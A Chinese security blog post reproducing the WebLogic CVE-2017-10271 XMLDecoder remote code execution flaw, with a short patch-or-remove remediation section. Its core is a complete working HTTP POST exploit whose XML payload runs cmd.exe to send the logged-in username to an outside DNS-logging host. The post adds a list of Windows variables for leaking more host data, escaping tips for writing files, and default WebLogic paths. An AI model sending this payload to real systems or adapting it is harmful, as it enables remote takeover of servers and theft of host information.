cve-2017-10271重现(附poc) | LSABLOG

首页 » NetworkSec » Penetration » 正文

cve-2017-10271重现(附poc)

0x00 概述

2017年12月下旬,网上爆出weblogic的WLS组件存在xmldecoder反序列化漏洞(cve-2017-10271),直接post构造的xml数据包即可rce,威力巨大,影响范围广,本文对此漏洞在windows下进行重现。

 

0x01 影响范围

Weblogic版本:

10.3.6.0.0

12.2.1.1.0

12.2.1.2.0

12.1.3.0.0

 

0x02 漏洞重现

访问ip/domain:port/wls-wsat/CoordinatorPortType

(默认端口7001)

如下图则表明可能存在此漏洞

开始测试

poc验证

Post数据包如下

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: www.xxx.com:7001

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Content-Type:text/xml

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 830

 

<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/”>

<soapenv:Header>

<work:WorkContext xmlns:work=”http://bea.com/2004/06/soap/workarea/”>

<java version=”1.8.0_131″ class=”java.beans.XMLDecoder”>

<void class=”java.lang.ProcessBuilder”>

<array class=”java.lang.String” length=”3″>

<void index=”0″>

<string>C:\\windows\\system32\\cmd.exe</string>

</void>

<void index=”1″>

<string>/c</string>

</void>

<void index=”2″>

<string>nslookup %username%.lsabcd.ceye.io</string>

</void>

</array>

<void method=”start”/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

观察响应:
HTTP/1.1 500 Internal Server Error

Connection: close

Date: Thu, 04 Jan 2018 02:38:24 GMT

Content-Type: text/xml;charset=”utf-8″

X-Powered-By: Servlet/2.5 JSP/2.1

Content-Length: 262

 

<?xml version=’1.0′ encoding=’UTF-8′?><S:Envelope xmlns:S=”http://schemas.xmlsoap.org/soap/envelope/”><S:Body><S:Fault xmlns:ns4=”http://www.w3.org/2003/05/soap-envelope”><faultcode>S:Server</faultcode><faultstring>0</faultstring></S:Fault></S:Body></S:Envelope>

响应码500,其实已经成功执行命令,看看dnslog的回显:

附上win下的一些变量

ping %COMPUTERNAME%.baidu.com

%COMPUTERNAME% 是一个变量,得到计算机名%ALLUSERSPROFILE% : 列出所有用户Profile文件位置。

%APPDATA% :  列出应用程序数据的默认存放位置。

%CD% :  列出当前目录。

%CLIENTNAME% :  列出联接到终端服务会话时客户端的NETBIOS名。

%CMDCMDLINE% :  列出启动当前cmd.exe所使用的命令行。

%CMDEXTVERSION% :  命令出当前命令处理程序扩展版本号。

%CommonProgramFiles% :  列出了常用文件的文件夹路径。

%COMPUTERNAME% :  列出了计算机名。

%COMSPEC% :  列出了可执行命令外壳(命令处理程序)的路径。

%DATE% :  列出当前日期。

%ERRORLEVEL% :  列出了最近使用的命令的错误代码。

%HOMEDRIVE% :  列出与用户主目录所在的驱动器盘符。

%HOMEPATH% :  列出用户主目录的完整路径。

%HOMESHARE% :  列出用户共享主目录的网络路径。

%LOGONSEVER% :  列出有效的当前登录会话的域名控制器名。

%NUMBER_OF_PROCESSORS% :  列出了计算机安装的处理器数。

%OS% :  列出操作系统的名字。(Windows XP 和 Windows 2000 列为 Windows_NT.)

%Path% :  列出了可执行文件的搜索路径。

%PATHEXT% :  列出操作系统认为可被执行的文件扩展名。

%PROCESSOR_ARCHITECTURE% :  列出了处理器的芯片架构。

%PROCESSOR_IDENTFIER% :  列出了处理器的描述。

%PROCESSOR_LEVEL% :  列出了计算机的处理器的型号。

%PROCESSOR_REVISION% :  列出了处理器的修订号。

%ProgramFiles% :  列出了Program Files文件夹的路径。

%PROMPT% :  列出了当前命令解释器的命令提示设置。

%RANDOM% :  列出界于0 和 32767之间的随机十进制数。

%SESSIONNAME% :  列出连接到终端服务会话时的连接和会话名。

%SYSTEMDRIVE% :  列出了Windows启动目录所在驱动器。

%SYSTEMROOT% :  列出了Windows启动目录的位置。

%TEMP% and %TMP% :  列出了当前登录的用户可用应用程序的默认临时目录。

%TIME% :  列出当前时间。

%USERDOMAIN% :  列出了包含用户帐号的域的名字。

%USERNAME% :  列出当前登录的用户的名字。

%USERPROFILE% :  列出当前用户Profile文件位置。

%WINDIR% :  列出操作系统目录的位置。

%ALLUSERSPROFILE% 本地 返回“所有用户”配置文件的位置。

%APPDATA% 本地 返回默认情况下应用程序存储数据的位置。

%CD% 本地 返回当前目录字符串。

%CMDCMDLINE% 本地 返回用来启动当前的 Cmd.exe 的准确命令行。

%CMDEXTVERSION% 系统 返回当前的“命令处理程序扩展”的版本号。

%COMPUTERNAME%  系统 返回计算机的名称。

%COMSPEC%  系统 返回命令行解释器可执行程序的准确路径。

%DATE%  系统 返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。

%ERRORLEVEL%  系统 返回上一条命令的错误代码。通常用非零值表示错误。

%HOMEDRIVE%  系统 返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

%HOMEPATH%  系统 返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

%HOMESHARE%  系统 返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

%LOGONSERVER%  本地 返回验证当前登录会话的域控制器的名称。

%NUMBER_OF_PROCESSORS%  系统 指定安装在计算机上的处理器的数目。

%OS%  系统 返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。

%PATH% 系统 指定可执行文件的搜索路径。

%PATHEXT% 系统 返回操作系统认为可执行的文件扩展名的列表。

%PROCESSOR_ARCHITECTURE%  系统 返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。

%PROCESSOR_IDENTFIER% 系统 返回处理器说明。

%PROCESSOR_LEVEL%  系统 返回计算机上安装的处理器的型号。

%PROCESSOR_REVISION% 系统 返回处理器的版本号。

%PROMPT% 本地 返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。

%RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。

%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根目录(即系统根目录)的驱动器。

%SYSTEMROOT%  系统 返回 Windows server operating system 根目录的位置。

%TEMP% 和 %TMP% 系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。

%TIME% 系统 返回当前时间。使用与 time /t 命令相同的格式。由 Cmd.exe 生成。有关 time 命令的详细信息,请参阅 Time。

%USERDOMAIN% 本地 返回包含用户帐户的域的名称。

%USERNAME% 本地 返回当前登录的用户的名称。

%USERPROFILE% 本地 返回当前用户的配置文件的位置。

%WINDIR% 系统 返回操作系统目录的位置。

 

%allusersprofile%——————–所有用户的profile路径

 

%Userprofile%———————–当前用户的配置文件目录

 

%Appdata%————————–当前用户的应用程序路径

 

%commonprogramfiles%————-应用程序公用的文件路径

 

%homedrive%————————当前用户的主盘

 

%Homepath%————————当前用户的主目录

 

%programfiles%———————-应用程序的默认安装目录

 

%systemdrive%———————-系统所在的盘符

 

%systemroot%———————–系统所在的目录

 

%windir%—————————-同上,总是跟systemroot一样

 

%tmp%——————————当前用户的临时目录

 

%temp%—————————–同上临时目录

 

0x03 其他

如果要写入文件,记得转义相关字符如

 "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",

几个默认路径:
bea_wls9_async_response

_WL_internal/bea_wls_internal/9j4dqk/war/

uddiexplorer

_WL_internal/wls-wast

 

0x04 修复方案

1. 打上10月的补丁(4月的补丁可以被绕过,没补好)

2. 删除wls-wsat组件

 

0x05 结语

受影响的用户及时修补,不然就被拿去挖矿了……

 

0x06 参考资料

www.freebuf.com/news/158007.html

https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=31453&highlight=weblogic

Comment